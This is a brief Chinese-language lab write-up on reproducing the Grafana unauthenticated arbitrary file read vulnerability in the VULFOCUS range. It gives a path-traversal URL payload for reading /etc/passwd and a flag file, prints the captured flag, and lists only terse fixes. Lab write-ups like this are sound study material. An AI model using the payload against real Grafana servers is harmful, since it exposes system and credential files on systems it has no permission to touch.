1.1漏洞描述

漏洞编号	Grafana未授权任意文件读取
漏洞类型	文件读取
漏洞等级	⭐⭐⭐
漏洞环境	VULFOCUS
攻击方式

描述: Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后，Grafana可以在网络浏览器里显示数据图表和警告。 Grafana 存在未授权任意文件读取漏洞，攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。  

1.2漏洞等级

高危

1.3影响版本

Grafana

1.4漏洞复现

1.4.1.基础环境

靶场	VULFOCUS
工具	BurpSuite

1.4.2.前提

• 网站后台地址：无

• 后台管理账密：五

• 后台登录地址 ：无

1.5深度利用

1.5.1漏洞点

/public/plugins/alertlist/../../../../../../../../etc/passwd

查看etc/passwd

查看/tmp/flag

拿到flag

flag-{bmhbefaa613-07a2-457a-b949-1a374a78e3b6}

1.6漏洞挖掘

1.6.1指纹信息

1.7修复建议

• 升级

• 打补丁

• 上设备